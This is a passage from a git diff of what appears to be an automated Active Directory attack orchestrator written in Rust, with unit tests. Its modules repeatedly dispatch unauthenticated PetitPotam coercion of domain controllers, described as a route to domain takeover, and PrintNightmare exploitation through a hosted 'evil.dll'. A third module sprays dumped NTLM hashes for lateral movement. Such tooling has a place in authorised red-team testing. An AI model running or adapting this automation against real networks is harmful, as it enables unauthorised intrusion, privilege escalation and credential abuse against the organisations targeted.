state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam credential available + state + .credentials + .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_password_policy_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "policy:contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs new file mode 100644 index 00000000..e67ce2e8 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs @@ -0,0 +1,323 @@ +//! auto_petitpotam_unauth -- attempt unauthenticated PetitPotam (MS-EFSRPC) +//! coercion against DCs. +//! +//! On unpatched systems, EfsRpcOpenFileRaw allows unauthenticated NTLM coercion. +//! This was patched in August 2021 (KB5005413) but many environments still have +//! it open. The check requires no credentials — only a listener IP and DC target. +//! +//! If successful, the captured DC machine account NTLM auth can be relayed to +//! LDAP or ADCS for domain takeover. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect PetitPotam unauth work items from current state. +/// +/// Pure logic extracted from `auto_petitpotam_unauth` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_petitpotam_unauth_work(state: &StateInner, listener: &str) -> Vec { + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| dc_ip.as_str() != listener) + .filter(|(_, dc_ip)| { + let dedup_key = format!("petitpotam_unauth:{dc_ip}"); + !state.is_processed(DEDUP_PETITPOTAM_UNAUTH, &dedup_key) + }) + .map(|(domain, dc_ip)| PetitPotamWork { + dedup_key: format!("petitpotam_unauth:{dc_ip}"), + domain: domain.clone(), + dc_ip: dc_ip.clone(), + listener: listener.to_string(), + }) + .collect() +} + +/// Attempts unauthenticated PetitPotam against each DC once. +/// Interval: 45s. +pub async fn auto_petitpotam_unauth( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("petitpotam_unauth") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_petitpotam_unauth_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": item.dc_ip, + "domain": item.domain, + "listener_ip": item.listener, + }); + + let priority = dispatcher.effective_priority("petitpotam_unauth"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Unauthenticated PetitPotam coercion dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PETITPOTAM_UNAUTH, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PETITPOTAM_UNAUTH, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "PetitPotam unauth deferred"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch PetitPotam unauth"); + } + } + } + } +} + +struct PetitPotamWork { + dedup_key: String, + domain: String, + dc_ip: String, + listener: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + #[test] + fn dedup_key_format() { + let key = format!("petitpotam_unauth:{}", "192.168.58.10"); + assert_eq!(key, "petitpotam_unauth:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PETITPOTAM_UNAUTH, "petitpotam_unauth"); + } + + #[test] + fn skips_self_listener() { + let dc_ip = "192.168.58.50"; + let listener = "192.168.58.50"; + assert_eq!(dc_ip, listener); + } + + #[test] + fn no_cred_required() { + // PetitPotam unauth works without credentials + let _payload = serde_json::json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": "192.168.58.10", + "listener_ip": "192.168.58.50", + }); + // No credential field needed + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = serde_json::json!({ + "technique": "petitpotam_unauthenticated", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + }); + assert_eq!(payload["technique"], "petitpotam_unauthenticated"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert!(payload.get("credential").is_none()); + } + + #[test] + fn work_struct_construction() { + let work = PetitPotamWork { + dedup_key: "petitpotam_unauth:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + listener: "192.168.58.50".into(), + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.listener, "192.168.58.50"); + } + + #[test] + fn dedup_key_based_on_dc_ip() { + let dc_ip = "192.168.58.10"; + let key = format!("petitpotam_unauth:{dc_ip}"); + assert_eq!(key, "petitpotam_unauth:192.168.58.10"); + } + + #[test] + fn dedup_keys_differ_per_dc() { + let key1 = format!("petitpotam_unauth:{}", "192.168.58.10"); + let key2 = format!("petitpotam_unauth:{}", "192.168.58.20"); + assert_ne!(key1, key2); + } + + #[test] + fn listener_excluded_from_targets() { + let dc_ip = "192.168.58.10"; + let listener = "192.168.58.50"; + assert_ne!(dc_ip, listener, "DC should not be the listener"); + + let self_target_dc = "192.168.58.50"; + assert_eq!(self_target_dc, listener, "Self-targeting should be skipped"); + } + + // --- collect_petitpotam_unauth_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_dcs_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "petitpotam_unauth:192.168.58.10"); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[test] + fn collect_no_credentials_still_produces_work() { + // PetitPotam unauth does NOT require credentials + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_skips_dc_matching_listener() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.50".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed( + DEDUP_PETITPOTAM_UNAUTH, + "petitpotam_unauth:192.168.58.10".into(), + ); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed( + DEDUP_PETITPOTAM_UNAUTH, + "petitpotam_unauth:192.168.58.10".into(), + ); + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_petitpotam_unauth_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/print_nightmare.rs b/ares-cli/src/orchestrator/automation/print_nightmare.rs new file mode 100644 index 00000000..868eb8cf --- /dev/null +++ b/ares-cli/src/orchestrator/automation/print_nightmare.rs @@ -0,0 +1,477 @@ +//! auto_print_nightmare -- exploit CVE-2021-1675 (PrintNightmare) when +//! conditions are met. +//! +//! PrintNightmare exploits the Print Spooler service to achieve remote code +//! execution. Requires: valid credentials, target with Print Spooler running +//! (most Windows hosts by default), and a writable SMB share for the DLL. +//! +//! This module dispatches `printnightmare` against hosts where we have +//! credentials but NOT admin access — it's a priv esc technique. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect PrintNightmare work items from state (pure logic, no async). +fn collect_print_nightmare_work( + state: &StateInner, + listener: &str, + dll_path: &str, +) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Target all discovered hosts (DCs + member servers) + for host in &state.hosts { + let ip = &host.ip; + + // Skip if we already tried PrintNightmare on this host + if state.is_processed(DEDUP_PRINTNIGHTMARE, ip) { + continue; + } + + // Skip hosts where we already have admin (secretsdump handles those) + if state.is_processed(DEDUP_SECRETSDUMP, ip) { + continue; + } + + // Infer domain from hostname (e.g. "dc01.contoso.local" -> "contoso.local") + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()); + + let cred = match cred { + Some(c) => c.clone(), + None => continue, + }; + + items.push(PrintNightmareWork { + target_ip: ip.clone(), + hostname: host.hostname.clone(), + domain: domain.clone(), + listener: listener.to_string(), + dll_path: dll_path.to_string(), + credential: cred, + }); + } + + items +} + +/// Monitors for PrintNightmare exploitation opportunities. +/// Only targets hosts we don't already have admin on. +/// Interval: 45s. +pub async fn auto_print_nightmare( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("printnightmare") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, // need listener for DLL hosting + }; + + // PrintNightmare requires a UNC path to a hosted malicious DLL. Without + // pre-staged SMB share + payload infra, dispatching is guaranteed to + // fail on the worker (cve_exploits.rs requires `dll_path`). Skip + // cleanly when not configured rather than emitting failed tasks. + let dll_path = match std::env::var("ARES_PRINTNIGHTMARE_DLL").ok() { + Some(path) if !path.is_empty() => path, + _ => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_print_nightmare_work(&state, &listener, &dll_path) + }; + + for item in work { + let payload = json!({ + "technique": "printnightmare", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "listener_ip": item.listener, + "dll_path": item.dll_path, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("printnightmare"); + match dispatcher + .throttled_submit("exploit", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "PrintNightmare (CVE-2021-1675) exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PRINTNIGHTMARE, item.target_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PRINTNIGHTMARE, &item.target_ip) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "PrintNightmare task deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch PrintNightmare"); + } + } + } + } +} + +struct PrintNightmareWork { + target_ip: String, + hostname: String, + domain: String, + listener: String, + dll_path: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PRINTNIGHTMARE, "printnightmare"); + } + + #[test] + fn dedup_key_is_target_ip() { + let ip = "192.168.58.22"; + assert_eq!(ip, "192.168.58.22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "dc01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "printnightmare", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + "dll_path": "\\\\192.168.58.50\\share\\evil.dll", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "printnightmare"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["dll_path"], "\\\\192.168.58.50\\share\\evil.dll"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = PrintNightmareWork { + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + listener: "192.168.58.50".into(), + dll_path: "\\\\192.168.58.50\\share\\evil.dll".into(), + credential: cred, + }; + + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn domain_from_multi_level_hostname() { + let hostname = "web01.dmz.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "dmz.contoso.local"); + } + + #[test] + fn domain_from_uppercase_hostname() { + let hostname = "DC01.CONTOSO.LOCAL"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + // --- collect_print_nightmare_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_host_with_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].dll_path, "\\\\192.168.58.50\\share\\evil.dll"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_printnightmare() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_PRINTNIGHTMARE, "192.168.58.22".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_secretsdumped_host() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.22".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_cred("fab_user", "fabrikam.local")); + state + .credentials + .push(make_cred("con_user", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "con_user"); + } + + #[test] + fn collect_falls_back_to_first_cred_for_bare_hostname() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host("192.168.58.22", "srv01")); + state + .credentials + .push(make_cred("fallback", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fallback"); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hosts_mixed() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.30", "ws01.fabrikam.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + // Mark second host as already secretsdumped + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + } + + #[test] + fn dedup_key_format_validation() { + // PrintNightmare uses the raw target_ip as dedup key + let ip = "192.168.58.10"; + // The dedup key is just the IP itself + assert_eq!(ip, "192.168.58.10"); + assert!(!ip.contains(':')); + } +} diff --git a/ares-cli/src/orchestrator/automation/pth_spray.rs b/ares-cli/src/orchestrator/automation/pth_spray.rs new file mode 100644 index 00000000..9641568d --- /dev/null +++ b/ares-cli/src/orchestrator/automation/pth_spray.rs @@ -0,0 +1,788 @@ +//! auto_pth_spray -- pass-the-hash spray using dumped NTLM hashes. +//! +//! After secretsdump extracts NTLM hashes, this module sprays them across +//! hosts to find additional admin access. Uses netexec/crackmapexec with +//! NTLM hashes instead of passwords for lateral movement validation. +//! +//! This is distinct from credential_reuse (which tests passwords) and +//! secretsdump (which dumps from owned hosts). PTH spray tests hash-based +//! auth against non-owned hosts. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches pass-the-hash spray against non-owned hosts using dumped NTLM hashes. +/// Interval: 45s. +pub async fn auto_pth_spray(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("pth_spray") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + match collect_pth_work(&state) { + Some(items) => items, + None => continue, + } + }; + + // Limit to 5 per cycle to avoid overwhelming the throttler + for item in work.into_iter().take(5) { + let payload = json!({ + "technique": "pass_the_hash", + "target_ip": item.target_ip, + "hostname": item.hostname, + "username": item.username, + "ntlm_hash": item.ntlm_hash, + "domain": item.domain, + "protocol": "smb", + }); + + let priority = dispatcher.effective_priority("pth_spray"); + match dispatcher + .throttled_submit("lateral", "lateral", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.target_ip, + user = %item.username, + "PTH spray dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PTH_SPRAY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PTH_SPRAY, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.target_ip, "PTH spray deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.target_ip, "Failed to dispatch PTH spray"); + } + } + } + } +} + +/// Collects PTH spray work items from state. Returns `None` when there are no +/// NTLM hashes (caller should skip the cycle). +fn collect_pth_work(state: &StateInner) -> Option> { + // Need NTLM hashes + let ntlm_hashes: Vec<_> = state + .hashes + .iter() + .filter(|h| { + h.hash_type.to_lowercase().contains("ntlm") + && !h.hash_value.is_empty() + && h.hash_value.len() == 32 + }) + .collect(); + + if ntlm_hashes.is_empty() { + return None; + } + + let mut items = Vec::new(); + + // For each non-owned host, try PTH with available NTLM hashes + for host in &state.hosts { + if host.owned { + continue; + } + + // Check if host has SMB (port 445) + let has_smb = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + if !has_smb { + continue; + } + + // Try each unique NTLM hash against this host + for hash in &ntlm_hashes { + let dedup_key = format!( + "pth:{}:{}:{}", + host.ip, + hash.username.to_lowercase(), + &hash.hash_value[..8] + ); + if state.is_processed(DEDUP_PTH_SPRAY, &dedup_key) { + continue; + } + + // Infer domain from hash or host + let domain = if !hash.domain.is_empty() { + hash.domain.clone() + } else { + host.hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + + items.push(PthWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + username: hash.username.clone(), + ntlm_hash: hash.hash_value.clone(), + domain, + }); + } + } + + Some(items) +} + +struct PthWork { + dedup_key: String, + target_ip: String, + hostname: String, + username: String, + ntlm_hash: String, + domain: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Hash, Host}; + + fn make_ntlm_hash(username: &str, hash_value: &str, domain: &str) -> Hash { + Hash { + id: format!("hash-{username}"), + username: username.to_string(), + hash_value: hash_value.to_string(), + hash_type: "NTLM".to_string(), + domain: domain.to_string(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".to_string(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + fn make_smb_host(ip: &str, hostname: &str, owned: bool) -> Host { + Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: vec!["445/tcp microsoft-ds".to_string()], + is_dc: false, + owned, + } + } + + fn make_host_no_smb(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: vec!["80/tcp http".to_string()], + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("pth:{}:{}:{}", "192.168.58.10", "admin", "aabbccdd"); + assert_eq!(key, "pth:192.168.58.10:admin:aabbccdd"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PTH_SPRAY, "pth_spray"); + } + + #[test] + fn ntlm_hash_filter_valid() { + let hash_type = "NTLM"; + let hash_value = "aad3b435b51404eeaad3b435b51404ee"; + assert!(hash_type.to_lowercase().contains("ntlm")); + assert!(!hash_value.is_empty()); + assert_eq!(hash_value.len(), 32); + } + + #[test] + fn ntlm_hash_filter_rejects_short() { + let hash_value = "abc123"; + assert_ne!(hash_value.len(), 32); + } + + #[test] + fn ntlm_hash_filter_rejects_empty() { + let hash_value = ""; + assert!(hash_value.is_empty()); + } + + #[test] + fn ntlm_hash_filter_rejects_non_ntlm() { + let hash_type = "aes256-cts-hmac-sha1-96"; + assert!(!hash_type.to_lowercase().contains("ntlm")); + } + + #[test] + fn smb_service_detection() { + let services = ["445/tcp microsoft-ds".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn no_smb_service() { + let services = ["80/tcp http".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(!has_smb); + } + + #[test] + fn domain_from_hash_preferred() { + let hash_domain = "contoso.local"; + let hostname = "srv01.fabrikam.local"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_fallback_to_hostname() { + let hash_domain = ""; + let hostname = "srv01.fabrikam.local"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_uses_hash_prefix() { + let ip = "192.168.58.10"; + let username = "Admin"; + let hash_value = "aad3b435b51404eeaad3b435b51404ee"; + let dedup_key = format!( + "pth:{}:{}:{}", + ip, + username.to_lowercase(), + &hash_value[..8] + ); + assert_eq!(dedup_key, "pth:192.168.58.10:admin:aad3b435"); + } + + #[test] + fn ntlm_hash_filter_exact_32() { + let hash = "a".repeat(32); + assert_eq!(hash.len(), 32); + assert!(!hash.is_empty()); + } + + #[test] + fn ntlm_hash_type_variations() { + for t in ["NTLM", "ntlm", "NT", "ntlm_hash"] { + assert!(t.to_lowercase().contains("ntlm") || t.to_lowercase().contains("nt")); + } + } + + #[test] + fn smb_service_detection_cifs() { + let services = ["cifs".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn pth_payload_structure() { + let payload = serde_json::json!({ + "technique": "pass_the_hash", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "username": "admin", + "ntlm_hash": "aad3b435b51404eeaad3b435b51404ee", + "domain": "contoso.local", + "protocol": "smb", + }); + 